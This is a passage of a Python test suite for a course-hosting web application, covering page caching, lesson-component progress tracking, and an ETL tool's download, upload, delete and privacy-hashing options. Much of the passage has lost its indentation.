        def get_environ_new(self):
            environ = get_environ_old(self)
            environ['course']['now_available'] = True
            environ['course']['browsable'] = False
            return environ
        sites.ApplicationContext.get_environ = get_environ_new
        def custom_inc(unused_increment=1, context=None):
            """A custom inc() function for cache miss counter."""
            self.keys.append(context)
            self.count += 1
        def assert_cached(url, assert_text, cache_miss_allowed=0):
            """Checks that specific URL supports caching."""
            memcache.flush_all()
            self.keys = []
            self.count = 0
            # Expect cache misses first time we load page.
            cache_miss_before = self.count
            response = self.get(url)
            assert_contains(assert_text, response.body)
            assert cache_miss_before != self.count
            # Expect no cache misses second time we load page.
            self.keys = []
            cache_miss_before = self.count
            response = self.get(url)
            assert_contains(assert_text, response.body)
            cache_miss_actual = self.count - cache_miss_before
            if cache_miss_actual != cache_miss_allowed:
                raise Exception(
                    'Expected %s cache misses, got %s. Keys are:\n%s' % (
                        cache_miss_allowed, cache_miss_actual,
                        '\n'.join(self.keys)))
        # Route cache-miss counting through custom_inc; restored below.
        old_inc = models.CACHE_MISS.inc
        models.CACHE_MISS.inc = custom_inc
        # Walk the site.
        email = 'test_units_lessons@google.com'
        name = 'Test Units Lessons'
        assert_cached('preview', 'Putting it all together')
        actions.login(email, is_admin=True)
        assert_cached('preview', 'Putting it all together')
        actions.register(self, name)
        assert_cached(
            'unit?unit=9', 'When search results suggest something new')
        assert_cached(
            'unit?unit=9&lesson=12', 'Understand options for different media')
        # Clean up.
        models.CACHE_MISS.inc = old_inc
        sites.ApplicationContext.get_environ = get_environ_old
        config.Registry.test_overrides = {}
        sites.reset_courses()
    def test_imported_course(self):
        """Tests various pages of the imported course."""
        # TODO(psimakov): Ideally, this test class should run all aspect tests
        # and they all should pass. However, the id's in the cloned course
        # do not match the id's of source sample course and we fetch pages
        # and assert page content using id's. For now, we will check the minimal
        # set of pages manually. Later, we have to make it run all known tests.
        self.import_sample_course()
        # Install a clone on the '/' so all the tests will treat it as normal
        # sample course.
        sites.setup_courses('course:/::ns_test')
        self.namespace = 'ns_test'
        email = 'test_units_lessons@google.com'
        name = 'Test Units Lessons'
        actions.login(email, is_admin=True)
        response = self.get('course')
        assert_contains('Putting it all together', response.body)
        actions.register(self, name)
        actions.check_profile(self, name)
        actions.view_announcements(self)
        # Check unit page without lesson specified.
        response = self.get('unit?unit=9')
        assert_contains('Interpreting results', response.body)
        assert_contains(
            'When search results suggest something new', response.body)
        # Check unit page with a lesson.
        response = self.get('unit?unit=9&lesson=12')
        assert_contains('Interpreting results', response.body)
        assert_contains(
            'Understand options for different media', response.body)
        # Check assessment page.
        response = self.get('assessment?name=21')
        assert_contains(
            '<script src="assets/js/assessment-21.js"></script>', response.body)
        # Check activity page.
        response = self.get('activity?unit=9&lesson=13')
        assert_contains(
            '<script src="assets/js/activity-13.js"></script>',
            response.body)
        # Clean up.
        sites.reset_courses()
class DatastoreBackedSampleCourseTest(DatastoreBackedCourseTest):
    """Run all existing tests using datastore-backed file system."""
    def setUp(self): # pylint: disable-msg=g-bad-name
        super(DatastoreBackedSampleCourseTest, self).setUp()
        # Seed the datastore-backed vfs with the full sample course content.
        self.init_course_data(self.upload_all_sample_course_files)
class LessonComponentsTest(DatastoreBackedCourseTest):
    """Test operations that make use of components in a lesson body."""
    def setUp(self):
        """Set up the dummy course for each test case in this class.

        Creates one unit with one lesson whose body contains a question, a
        (non-trackable) video, and a question group.
        """
        super(LessonComponentsTest, self).setUp()
        self.course = courses.Course(None, app_context=self.app_context)
        self.unit = self.course.add_unit()
        self.lesson = self.course.add_lesson(self.unit)
        self.lesson.objectives = """
            <question quid="123" weight="1" instanceid="QN"></question>
            random_text
            <gcb-youtube videoid="Kdg2drcUjYI" instanceid="VD"></gcb-youtube>
            more_random_text
            <question-group qgid="456" instanceid="QG"></question-group>
            yet_more_random_text
            """
        self.lesson.has_activity = False
        self.course.update_lesson(self.lesson)
        self.course.save()
        self.tracker = self.course.get_progress_tracker()
    def test_component_discovery(self):
        """Test extraction of components from a lesson body."""
        cpt_list = self.course.get_components(
            self.unit.unit_id, self.lesson.lesson_id)
        assert cpt_list == [
            {'instanceid': 'QN', 'quid': '123', 'weight': '1',
             'cpt_name': 'question'},
            {'instanceid': 'VD', 'cpt_name': 'gcb-youtube',
             'videoid': 'Kdg2drcUjYI'},
            {'instanceid': 'QG', 'qgid': '456', 'cpt_name': 'question-group'}
        ]
        # Only the question and question-group are trackable; the video is
        # excluded from the valid component id list.
        valid_cpt_ids = self.tracker.get_valid_component_ids(
            self.unit.unit_id, self.lesson.lesson_id)
        assert valid_cpt_ids == ['QN', 'QG']
    def test_component_progress(self):
        """Test that progress tracking for components is done correctly."""
        unit_id = self.unit.unit_id
        lesson_id = self.lesson.lesson_id
        student = models.Student(key_name='lesson-body-test-student')
        # Progress codes asserted below: 0 = not started, 1 = in progress,
        # 2 = completed.
        assert self.tracker.get_unit_progress(student)[unit_id] == 0
        assert self.tracker.get_lesson_progress(
            student, unit_id)[lesson_id] == {'html': 0, 'activity': 0}
        # Visiting the lesson page has no effect on progress, since it contains
        # trackable components.
        self.tracker.put_html_accessed(student, unit_id, lesson_id)
        assert self.tracker.get_unit_progress(student)[unit_id] == 0
        assert self.tracker.get_lesson_progress(
            student, unit_id)[lesson_id] == {'html': 0, 'activity': 0}
        # Marking progress for a non-existent component id has no effect.
        self.tracker.put_component_completed(student, unit_id, lesson_id, 'a')
        assert self.tracker.get_unit_progress(student)[unit_id] == 0
        assert self.tracker.get_lesson_progress(
            student, unit_id)[lesson_id] == {'html': 0, 'activity': 0}
        # Marking progress for a non-trackable component id has no effect.
        self.tracker.put_component_completed(student, unit_id, lesson_id, 'VD')
        assert self.tracker.get_unit_progress(student)[unit_id] == 0
        assert self.tracker.get_lesson_progress(
            student, unit_id)[lesson_id] == {'html': 0, 'activity': 0}
        # Completing a trackable component marks the lesson as in-progress,
        self.tracker.put_component_completed(student, unit_id, lesson_id, 'QN')
        assert self.tracker.get_unit_progress(student)[unit_id] == 1
        assert self.tracker.get_lesson_progress(
            student, unit_id)[lesson_id] == {'html': 1, 'activity': 0}
        # Completing the same component again has no further effect.
        self.tracker.put_component_completed(student, unit_id, lesson_id, 'QN')
        assert self.tracker.get_unit_progress(student)[unit_id] == 1
        assert self.tracker.get_lesson_progress(
            student, unit_id)[lesson_id] == {'html': 1, 'activity': 0}
        # Completing the other trackable component marks the lesson (and unit)
        # as completed.
        self.tracker.put_component_completed(student, unit_id, lesson_id, 'QG')
        assert self.tracker.get_unit_progress(student)[unit_id] == 2
        assert self.tracker.get_lesson_progress(
            student, unit_id)[lesson_id] == {'html': 2, 'activity': 0}
class FakeEnvironment(object):
    """Temporary fake tools.etl.remote.Environment.

    Bypasses making a remote_api connection because webtest can't handle it and
    we don't want to bring up a local server for our functional tests. When this
    fake is used, the in-process datastore stub will handle RPCs.

    TODO(johncox): find a way to make webtest successfully emulate the
    remote_api endpoint and get rid of this fake.
    """
    def __init__(self, application_id, server, path=None):
        # Fixed attribute name typo: was self._appication_id. The attribute
        # is never read in this module; it only mirrors the real
        # Environment's constructor arguments.
        self._application_id = application_id
        self._path = path
        self._server = server
    def establish(self):
        """No-op; a real Environment would open the remote_api connection."""
        pass
class EtlMainTestCase(DatastoreBackedCourseTest):
"""Tests tools/etl/etl.py's main()."""
# Allow access to protected members under test.
# pylint: disable-msg=protected-access
    def setUp(self):
        """Configures EtlMainTestCase.

        Builds the shared etl.PARSER argument lists used by the tests and
        mounts two courses: a version 1.3 course at self.url_prefix and a
        version 1.2 course at '/'.
        """
        super(EtlMainTestCase, self).setUp()
        self.test_environ = copy.deepcopy(os.environ)
        # In etl.main, use test auth scheme to avoid interactive login.
        self.test_environ['SERVER_SOFTWARE'] = remote.TEST_SERVER_SOFTWARE
        self.archive_path = os.path.join(self.test_tempdir, 'archive.zip')
        self.new_course_title = 'New Course Title'
        self.url_prefix = '/test'
        self.raw = 'course:%s::ns_test' % self.url_prefix
        self.swap(os, 'environ', self.test_environ)
        # Positional args shared by every etl invocation:
        # course_url_prefix, application_id, server.
        self.common_args = [
            self.url_prefix, 'myapp', 'localhost:8080']
        self.common_command_args = self.common_args + [
            '--archive_path', self.archive_path]
        self.common_course_args = [etl._TYPE_COURSE] + self.common_command_args
        self.common_datastore_args = [
            etl._TYPE_DATASTORE] + self.common_command_args
        self.delete_datastore_args = etl.PARSER.parse_args(
            [etl._MODE_DELETE, etl._TYPE_DATASTORE] + self.common_args)
        self.download_course_args = etl.PARSER.parse_args(
            [etl._MODE_DOWNLOAD] + self.common_course_args)
        self.upload_course_args = etl.PARSER.parse_args(
            [etl._MODE_UPLOAD] + self.common_course_args)
        # Set up courses: version 1.3, version 1.2.
        sites.setup_courses(self.raw + ', course:/:/')
    def tearDown(self):
        """Unregister the courses mounted in setUp."""
        sites.reset_courses()
        super(EtlMainTestCase, self).tearDown()
    def create_app_yaml(self, context, title=None):
        """Write a default course.yaml into the context's filesystem.

        Args:
            context: application context whose vfs receives the file.
            title: optional course title overriding the default.
        """
        yaml = copy.deepcopy(courses.DEFAULT_COURSE_YAML_DICT)
        if title:
            yaml['course']['title'] = title
        context.fs.impl.put(
            os.path.join(
                appengine_config.BUNDLE_ROOT, etl._COURSE_YAML_PATH_SUFFIX),
            etl._ReadWrapper(str(yaml)), is_draft=False)
def create_archive(self):
self.upload_all_sample_course_files([])
self.import_sample_course()
args = etl.PARSER.parse_args(['download'] + self.common_course_args)
etl.main(args, environment_class=FakeEnvironment)
sites.reset_courses()
def create_empty_course(self, raw):
sites.setup_courses(raw)
context = etl_lib.get_context(self.url_prefix)
course = etl._get_course_from(etl_lib.get_context(self.url_prefix))
course.delete_all()
self.create_app_yaml(context)
    def import_sample_course(self):
        """Imports a sample course."""
        # Import sample course.
        # Course [0] is the destination (self.raw), course [1] the '/' source.
        dst_app_context = sites.get_all_courses()[0]
        src_app_context = sites.get_all_courses()[1]
        # Patch in a course.yaml.
        self.create_app_yaml(dst_app_context, title=self.new_course_title)
        dst_course = courses.Course(None, app_context=dst_app_context)
        errors = []
        src_course_out, dst_course_out = dst_course.import_from(
            src_app_context, errors)
        if errors:
            raise Exception(errors)
        assert len(
            src_course_out.get_units()) == len(dst_course_out.get_units())
        dst_course_out.save()
    def test_delete_course_fails(self):
        """Deleting a whole course via ETL is not implemented and must raise."""
        args = etl.PARSER.parse_args(
            [etl._MODE_DELETE, etl._TYPE_COURSE] + self.common_args)
        self.assertRaises(
            NotImplementedError,
            etl.main, args, environment_class=FakeEnvironment)
    def test_delete_datastore_fails_if_user_does_not_confirm(self):
        """Datastore delete must abort when the confirmation prompt mismatches."""
        # Make the prompt return something other than the expected input.
        self.swap(
            etl, '_raw_input',
            lambda x: 'not' + etl._DELETE_DATASTORE_CONFIRMATION_INPUT)
        self.assertRaises(
            SystemExit, etl.main, self.delete_datastore_args,
            environment_class=FakeEnvironment)
    def test_delete_datastore_succeeds(self):
        """Tests delete datastore success for populated and empty datastores."""
        self.import_sample_course()
        context = etl_lib.get_context(
            self.delete_datastore_args.course_url_prefix)
        # Auto-confirm the interactive deletion prompt.
        self.swap(
            etl, '_raw_input',
            lambda x: etl._DELETE_DATASTORE_CONFIRMATION_INPUT)
        # Spot check that some kinds are populated.
        old_namespace = namespace_manager.get_namespace()
        try:
            namespace_manager.set_namespace(context.get_namespace_name())
            self.assertTrue(vfs.FileDataEntity.all().get())
            self.assertTrue(vfs.FileMetadataEntity.all().get())
        finally:
            namespace_manager.set_namespace(old_namespace)
        # Delete against a datastore with contents runs successfully.
        etl.main(self.delete_datastore_args, environment_class=FakeEnvironment)
        # Spot check that those kinds are now empty.
        # Reuses old_namespace captured above; it was restored in between.
        try:
            namespace_manager.set_namespace(context.get_namespace_name())
            self.assertFalse(vfs.FileDataEntity.all().get())
            self.assertFalse(vfs.FileMetadataEntity.all().get())
        finally:
            namespace_manager.set_namespace(old_namespace)
        # Delete against a datastore without contents runs successfully.
        etl.main(self.delete_datastore_args, environment_class=FakeEnvironment)
    def test_disable_remote_cannot_be_passed_for_mode_other_than_run(self):
        """--disable_remote with a download-mode invocation must exit."""
        bad_args = etl.PARSER.parse_args(
            [etl._MODE_DOWNLOAD] + self.common_course_args +
            ['--disable_remote'])
        self.assertRaises(
            SystemExit, etl.main, bad_args, environment_class=FakeEnvironment)
def test_download_course_creates_valid_archive(self):
"""Tests download of course data and archive creation."""
self.upload_all_sample_course_files([])
self.import_sample_course()
etl.main(self.download_course_args, environment_class=FakeEnvironment)
# Don't use Archive and Manifest here because we want to test the raw
# structure of the emitted zipfile.
zip_archive = zipfile.ZipFile(self.archive_path)
manifest = transforms.loads(
zip_archive.open(etl._MANIFEST_FILENAME).read())
self.assertGreaterEqual(
courses.COURSE_MODEL_VERSION_1_3, manifest['version'])
self.assertEqual(
'course:%s::ns_test' % self.url_prefix, manifest['raw'])
for entity in manifest['entities']:
self.assertTrue(entity.has_key('is_draft'))
self.assertTrue(zip_archive.open(entity['path']))
    def test_download_course_errors_if_archive_path_exists_on_disk(self):
        """A second download to the same archive path must exit, not overwrite."""
        self.upload_all_sample_course_files([])
        self.import_sample_course()
        # First download succeeds and creates the archive file.
        etl.main(self.download_course_args, environment_class=FakeEnvironment)
        self.assertRaises(
            SystemExit, etl.main, self.download_course_args,
            environment_class=FakeEnvironment)
    def test_download_errors_if_course_url_prefix_does_not_exist(self):
        """Download must exit when no course is mounted at the URL prefix."""
        # Remove the courses mounted in setUp so the prefix resolves to nothing.
        sites.reset_courses()
        self.assertRaises(
            SystemExit, etl.main, self.download_course_args,
            environment_class=FakeEnvironment)
def test_download_course_errors_if_course_version_is_pre_1_3(self):
args = etl.PARSER.parse_args(
['download', 'course', '/'] + self.common_course_args[2:])
self.upload_all_sample_course_files([])
self.import_sample_course()
self.assertRaises(
SystemExit, etl.main, args, environment_class=FakeEnvironment)
    def test_download_datastore_fails_if_datastore_types_not_in_datastore(self):
        """Requesting an unknown datastore kind must make the download exit."""
        download_datastore_args = etl.PARSER.parse_args(
            [etl._MODE_DOWNLOAD] + self.common_datastore_args +
            ['--datastore_types', 'missing'])
        self.assertRaises(
            SystemExit, etl.main, download_datastore_args,
            environment_class=FakeEnvironment)
    def test_download_datastore_succeeds(self):
        """Test download of datastore data and archive creation."""
        download_datastore_args = etl.PARSER.parse_args(
            [etl._MODE_DOWNLOAD] + self.common_datastore_args +
            ['--datastore_types', 'Student,StudentPropertyEntity'])
        context = etl_lib.get_context(download_datastore_args.course_url_prefix)
        # Seed the course namespace with two entities of each requested kind.
        old_namespace = namespace_manager.get_namespace()
        try:
            namespace_manager.set_namespace(context.get_namespace_name())
            first_student = models.Student(key_name='first_student')
            second_student = models.Student(key_name='second_student')
            first_entity = models.StudentPropertyEntity(
                key_name='first_student-property_entity')
            second_entity = models.StudentPropertyEntity(
                key_name='second_student-property_entity')
            db.put([first_student, second_student, first_entity, second_entity])
        finally:
            namespace_manager.set_namespace(old_namespace)
        etl.main(
            download_datastore_args, environment_class=FakeEnvironment)
        archive = etl._Archive(self.archive_path)
        archive.open('r')
        # One .json file per requested kind must be listed in the manifest.
        self.assertEqual(
            ['Student.json', 'StudentPropertyEntity.json'],
            sorted(
                [os.path.basename(e.path) for e in archive.manifest.entities]))
        student_entity = [
            e for e in archive.manifest.entities
            if e.path.endswith('Student.json')][0]
        entity_entity = [
            e for e in archive.manifest.entities
            if e.path.endswith('StudentPropertyEntity.json')][0]
        # Ensure .json files are deserializable into Python objects.
        students = sorted(
            transforms.loads(archive.get(student_entity.path))['rows'],
            key=lambda d: d['key.name'])
        entities = sorted(
            transforms.loads(archive.get(entity_entity.path))['rows'],
            key=lambda d: d['key.name'])
        # Spot check their contents.
        self.assertEqual(
            [model.key().name() for model in [first_student, second_student]],
            [student['key.name'] for student in students])
        self.assertEqual(
            [model.key().name() for model in [first_entity, second_entity]],
            [entity['key.name'] for entity in entities])
def test_download_datastore_with_privacy_maintains_references(self):
"""Test download of datastore data and archive creation."""
# Both seeded entities share this user_id; with --privacy it must be
# transformed, but transformed identically across entity kinds.
unsafe_user_id = '1'
download_datastore_args = etl.PARSER.parse_args(
[etl._MODE_DOWNLOAD] + self.common_datastore_args +
['--datastore_types', 'EventEntity,Student', '--privacy',
'--privacy_secret', 'super_seekrit'])
context = etl_lib.get_context(download_datastore_args.course_url_prefix)
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace(context.get_namespace_name())
event = models.EventEntity(user_id=unsafe_user_id)
student = models.Student(
key_name='first_student', user_id=unsafe_user_id)
db.put([event, student])
finally:
namespace_manager.set_namespace(old_namespace)
etl.main(
download_datastore_args, environment_class=FakeEnvironment)
archive = etl._Archive(self.archive_path)
archive.open('r')
self.assertEqual(
['EventEntity.json', 'Student.json'],
sorted(
[os.path.basename(e.path) for e in archive.manifest.entities]))
event_entity_entity = [
e for e in archive.manifest.entities
if e.path.endswith('EventEntity.json')][0]
student_entity = [
e for e in archive.manifest.entities
if e.path.endswith('Student.json')][0]
# Ensure .json files are deserializable into Python objects...
event_entities = transforms.loads(
archive.get(event_entity_entity.path))['rows']
students = transforms.loads(archive.get(student_entity.path))['rows']
# Reference maintained.
self.assertEqual(event_entities[0]['user_id'], students[0]['user_id'])
# But user_id transformed.
self.assertNotEqual(unsafe_user_id, event_entities[0]['user_id'])
self.assertNotEqual(unsafe_user_id, students[0]['user_id'])
def test_privacy_fails_if_not_downloading_datastore(self):
"""--privacy must be rejected outside 'download datastore' runs."""
# Wrong mode: upload instead of download.
wrong_mode = etl.PARSER.parse_args(
[etl._MODE_UPLOAD] + self.common_datastore_args + ['--privacy'])
self.assertRaises(
SystemExit, etl.main, wrong_mode, environment_class=FakeEnvironment)
# Wrong target type: course download instead of datastore download.
wrong_type = etl.PARSER.parse_args(
[etl._MODE_DOWNLOAD] + self.common_course_args + ['--privacy'])
self.assertRaises(
SystemExit, etl.main, wrong_type, environment_class=FakeEnvironment)
def test_privacy_secret_fails_if_not_download_datastore_with_privacy(self):
"""Tests invalid flag combinations related to --privacy."""
missing_privacy = etl.PARSER.parse_args(
[etl._MODE_DOWNLOAD] + self.common_datastore_args +
['--privacy_secret', 'foo'])
self.assertRaises(
SystemExit, etl.main, missing_privacy,
environment_class=FakeEnvironment)
self.assertRaises(
SystemExit, etl.main, missing_privacy,
environment_class=FakeEnvironment)
wrong_mode = etl.PARSER.parse_args(
[etl._MODE_UPLOAD] + self.common_datastore_args +
['--privacy_secret', 'foo', '--privacy'])
self.assertRaises(
SystemExit, etl.main, wrong_mode, environment_class=FakeEnvironment)
wrong_type = etl.PARSER.parse_args(
[etl._MODE_DOWNLOAD] + self.common_course_args +
['--privacy_secret', 'foo', '--privacy'])
self.assertRaises(
SystemExit, etl.main, wrong_type, environment_class=FakeEnvironment)
def test_run_fails_when_delegated_argument_parsing_fails(self):
"""A job must exit when its own --job_args parser rejects the input."""
bad_args = etl.PARSER.parse_args(
['run', 'tools.etl_lib.Job'] + self.common_args +
['--job_args', "'unexpected_argument'"])
self.assertRaises(
SystemExit, etl.main, bad_args, environment_class=FakeEnvironment)
def test_run_fails_when_if_requested_class_missing_or_invalid(self):
"""'run' must exit for unknown classes or classes that aren't Jobs."""
# Dotted path that does not resolve to anything importable.
bad_args = etl.PARSER.parse_args(
['run', 'a.missing.class.or.Module'] + self.common_args)
self.assertRaises(
SystemExit, etl.main, bad_args, environment_class=FakeEnvironment)
# Importable class, but not an etl job type.
bad_args = etl.PARSER.parse_args(
['run', 'tools.etl.etl._Archive'] + self.common_args)
self.assertRaises(
SystemExit, etl.main, bad_args, environment_class=FakeEnvironment)
def test_run_print_memcache_stats_succeeds(self):
"""Tests examples.WriteStudentEmailsToFile prints stats to stdout."""
args = etl.PARSER.parse_args(
['run', 'tools.etl.examples.PrintMemcacheStats'] + self.common_args)
# Generate exactly one miss, one set and one hit to make the expected
# stats values below deterministic.
memcache.get('key')
memcache.set('key', 1)
memcache.get('key')
# Capture stdout for the duration of the run, restoring it afterwards.
old_stdout = sys.stdout
stdout = cStringIO.StringIO()
try:
sys.stdout = stdout
etl.main(args, environment_class=FakeEnvironment)
finally:
sys.stdout = old_stdout
expected = examples.PrintMemcacheStats._STATS_TEMPLATE % {
'byte_hits': 1,
'bytes': 1,
'hits': 1,
'items': 1,
'misses': 1,
'oldest_item_age': 0,
}
self.assertTrue(expected in stdout.getvalue())
def test_run_skips_remote_env_setup_when_disable_remote_passed(self):
"""With --disable_remote, main() runs without an environment_class."""
args = etl.PARSER.parse_args(
['run', 'tools.etl.etl_lib.Job'] + self.common_args +
['--disable_remote'])
# No environment_class is passed; success means no remote setup ran.
etl.main(args)
def test_run_upload_file_to_course_succeeds(self):
"""Tests upload of a single local file to a course."""
path = os.path.join(self.test_tempdir, 'file')
target = 'assets/file'
remote_path = os.path.join(appengine_config.BUNDLE_ROOT, target)
contents = 'contents'
with open(path, 'w') as f:
f.write(contents)
args = etl.PARSER.parse_args(
['run', 'tools.etl.examples.UploadFileToCourse'] +
self.common_args + ['--job_args=%s %s' % (path, target)])
sites.setup_courses(self.raw)
context = etl_lib.get_context(args.course_url_prefix)
# The target must not exist before the job and must exist, with the
# uploaded contents, after it.
self.assertFalse(context.fs.impl.get(remote_path))
etl.main(args, environment_class=FakeEnvironment)
self.assertEqual(contents, context.fs.impl.get(remote_path).read())
def test_run_write_student_emails_to_file_succeeds(self):
"""Tests args passed to and run of examples.WriteStudentEmailsToFile."""
email1 = 'email1@example.com'
email2 = 'email2@example.com'
path = os.path.join(self.test_tempdir, 'emails')
# --batch_size 1 forces the job to page through students one at a time.
args = etl.PARSER.parse_args(
['run', 'tools.etl.examples.WriteStudentEmailsToFile'] +
self.common_args + ['--job_args=%s --batch_size 1' % path])
context = etl_lib.get_context(args.course_url_prefix)
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace(context.get_namespace_name())
first_student = models.Student(key_name=email1)
second_student = models.Student(key_name=email2)
db.put([first_student, second_student])
finally:
namespace_manager.set_namespace(old_namespace)
etl.main(args, environment_class=FakeEnvironment)
# One email per line, in key order.
self.assertEqual('%s\n%s\n' % (email1, email2), open(path).read())
def test_upload_course_fails_if_archive_cannot_be_opened(self):
"""Upload must exit when no archive exists at the given path."""
sites.setup_courses(self.raw)
self.assertRaises(
SystemExit, etl.main, self.upload_course_args,
environment_class=FakeEnvironment)
def test_upload_course_fails_if_archive_course_json_malformed(self):
"""Upload must exit when the archive's course.json is not valid JSON."""
self.create_archive()
self.create_empty_course(self.raw)
# Corrupt the archive in place by overwriting course.json with junk.
zip_archive = zipfile.ZipFile(self.archive_path, 'a')
zip_archive.writestr(
etl._Archive.get_internal_path(etl._COURSE_JSON_PATH_SUFFIX),
'garbage')
zip_archive.close()
self.assertRaises(
SystemExit, etl.main, self.upload_course_args,
environment_class=FakeEnvironment)
def test_upload_course_fails_if_archive_course_yaml_malformed(self):
"""Upload must exit when the archive's course.yaml is not valid YAML."""
self.create_archive()
self.create_empty_course(self.raw)
# '{' alone is syntactically invalid YAML/JSON, corrupting the file.
zip_archive = zipfile.ZipFile(self.archive_path, 'a')
zip_archive.writestr(
etl._Archive.get_internal_path(etl._COURSE_YAML_PATH_SUFFIX),
'{')
zip_archive.close()
self.assertRaises(
SystemExit, etl.main, self.upload_course_args,
environment_class=FakeEnvironment)
def test_upload_course_fails_if_course_has_non_course_yaml_contents(self):
"""Upload must exit when the target course is not empty."""
# Importing the sample course leaves real content in the target,
# which the upload refuses to overwrite without --force_overwrite.
self.upload_all_sample_course_files([])
self.import_sample_course()
self.assertRaises(
SystemExit, etl.main, self.upload_course_args,
environment_class=FakeEnvironment)
def test_upload_course_fails_if_force_overwrite_passed_with_bad_args(self):
"""--force_overwrite is invalid when uploading datastore data."""
self.create_archive()
bad_args = etl.PARSER.parse_args(
[etl._MODE_UPLOAD] + self.common_datastore_args + [
'--force_overwrite'])
self.assertRaises(
SystemExit, etl.main, bad_args, environment_class=FakeEnvironment)
def test_upload_course_fails_if_no_course_with_url_prefix_found(self):
"""Upload must exit when the course URL prefix matches no course."""
# Note: unlike the other upload tests, no course is created here.
self.create_archive()
self.assertRaises(
SystemExit, etl.main, self.upload_course_args,
environment_class=FakeEnvironment)
def test_upload_course_succeeds(self):
"""Tests upload of archive contents."""
self.create_archive()
self.create_empty_course(self.raw)
context = etl_lib.get_context(self.upload_course_args.course_url_prefix)
# Sanity check: the empty course does not yet carry the new title.
self.assertNotEqual(self.new_course_title, context.get_title())
etl.main(self.upload_course_args, environment_class=FakeEnvironment)
archive = etl._Archive(self.archive_path)
archive.open('r')
# Re-fetch the context so post-upload state is observed.
context = etl_lib.get_context(self.upload_course_args.course_url_prefix)
filesystem_contents = context.fs.impl.list(appengine_config.BUNDLE_ROOT)
self.assertEqual(
len(archive.manifest.entities), len(filesystem_contents))
self.assertEqual(self.new_course_title, context.get_title())
# Spot check one known unit from the sample course, then verify all
# units survived the round trip with non-empty titles.
units = etl._get_course_from(context).get_units()
spot_check_single_unit = [u for u in units if u.unit_id == 9][0]
self.assertEqual('Interpreting results', spot_check_single_unit.title)
for unit in units:
self.assertTrue(unit.title)
# Draft/published state must be preserved for every uploaded entity.
for entity in archive.manifest.entities:
full_path = os.path.join(
appengine_config.BUNDLE_ROOT,
etl._Archive.get_external_path(entity.path))
stream = context.fs.impl.get(full_path)
self.assertEqual(entity.is_draft, stream.metadata.is_draft)
def test_upload_course_with_force_overwrite_succeeds(self):
"""Tests upload into non-empty course with --force_overwrite."""
# Populate a real course, download it, then re-upload over itself.
self.upload_all_sample_course_files([])
self.import_sample_course()
etl.main(self.download_course_args, environment_class=FakeEnvironment)
force_overwrite_args = etl.PARSER.parse_args(
[etl._MODE_UPLOAD] + self.common_course_args + [
'--force_overwrite'])
etl.main(force_overwrite_args, environment_class=FakeEnvironment)
# Verification below mirrors test_upload_course_succeeds.
archive = etl._Archive(self.archive_path)
archive.open('r')
context = etl_lib.get_context(self.upload_course_args.course_url_prefix)
filesystem_contents = context.fs.impl.list(appengine_config.BUNDLE_ROOT)
self.assertEqual(
len(archive.manifest.entities), len(filesystem_contents))
self.assertEqual(self.new_course_title, context.get_title())
units = etl._get_course_from(context).get_units()
spot_check_single_unit = [u for u in units if u.unit_id == 9][0]
self.assertEqual('Interpreting results', spot_check_single_unit.title)
for unit in units:
self.assertTrue(unit.title)
for entity in archive.manifest.entities:
full_path = os.path.join(
appengine_config.BUNDLE_ROOT,
etl._Archive.get_external_path(entity.path))
stream = context.fs.impl.get(full_path)
self.assertEqual(entity.is_draft, stream.metadata.is_draft)
def test_upload_datastore_fails(self):
"""Datastore upload is not implemented and must say so explicitly."""
upload_datastore_args = etl.PARSER.parse_args(
[etl._MODE_UPLOAD] + self.common_datastore_args +
['--datastore_types', 'doesnt_matter'])
self.assertRaises(
NotImplementedError, etl.main, upload_datastore_args,
environment_class=FakeEnvironment)
class EtlPrivacyTransformFunctionTestCase(actions.TestBase):
"""Tests privacy transforms."""
# Testing protected functions. pylint: disable-msg=protected-access
def test_hmac_sha_2_256_is_stable(self):
# The transform must be deterministic so transformed IDs remain
# joinable across entity kinds within one download.
self.assertEqual(
etl._hmac_sha_2_256('secret', 'value'),
etl._hmac_sha_2_256('secret', 'value'))
def test_is_identity_transform_when_privacy_false(self):
# With privacy off, the secret is irrelevant and values pass through.
self.assertEqual(
1, etl._get_privacy_transform_fn(False, 'no_effect')(1))
self.assertEqual(
1, etl._get_privacy_transform_fn(False, 'other_value')(1))
def test_is_hmac_sha_2_256_when_privacy_true(self):
self.assertEqual(
etl._hmac_sha_2_256('secret', 'value'),
etl._get_privacy_transform_fn(True, 'secret')('value'))
# TODO(johncox): re-enable these tests once we figure out how to make webtest
# play nice with remote_api.
class EtlRemoteEnvironmentTestCase(actions.TestBase):
"""Tests tools/etl/remote.py."""
# Method name determined by superclass. pylint: disable-msg=g-bad-name
def setUp(self):
super(EtlRemoteEnvironmentTestCase, self).setUp()
# Work on a copy so tests can mutate os.environ safely via swap().
self.test_environ = copy.deepcopy(os.environ)
# Allow access to protected members under test.
# pylint: disable-msg=protected-access
# The 'disabled_test_' prefix keeps these out of the test runner; see
# the TODO above the class about webtest vs remote_api.
def disabled_test_can_establish_environment_in_dev_mode(self):
# Stub the call that requires user input so the test runs unattended.
self.swap(__builtin__, 'raw_input', lambda _: 'username')
self.assertEqual(os.environ['SERVER_SOFTWARE'], remote.SERVER_SOFTWARE)
# establish() performs RPC. If it doesn't throw, we're good.
remote.Environment('mycourse', 'localhost:8080').establish()
def disabled_test_can_establish_environment_in_test_mode(self):
self.test_environ['SERVER_SOFTWARE'] = remote.TEST_SERVER_SOFTWARE
self.swap(os, 'environ', self.test_environ)
# establish() performs RPC. If it doesn't throw, we're good.
remote.Environment('mycourse', 'localhost:8080').establish()
class CourseUrlRewritingTest(CourseUrlRewritingTestBase):
"""Run all existing tests using '/courses/pswg' base URL rewrite rules."""
# Intentionally empty: the course test suites are injected into
# __bases__ at module load time (see the bottom of this file).
class VirtualFileSystemTest(VirtualFileSystemTestBase):
"""Run all existing tests using virtual local file system."""
# Intentionally empty: test suites are appended to __bases__ below.
class MemcacheTestBase(actions.TestBase):
"""Executes all tests with memcache enabled."""
def setUp(self): # pylint: disable-msg=g-bad-name
super(MemcacheTestBase, self).setUp()
# Force-enable memcache for the duration of each test.
config.Registry.test_overrides = {models.CAN_USE_MEMCACHE.name: True}
def tearDown(self): # pylint: disable-msg=g-bad-name
# Clear overrides before the superclass tears the environment down.
config.Registry.test_overrides = {}
super(MemcacheTestBase, self).tearDown()
class MemcacheTest(MemcacheTestBase):
"""Executes all tests with memcache enabled."""
# Intentionally empty: test suites are appended to __bases__ below.
class TransformsJsonFileTestCase(actions.TestBase):
"""Tests for models/transforms.py's JsonFile."""
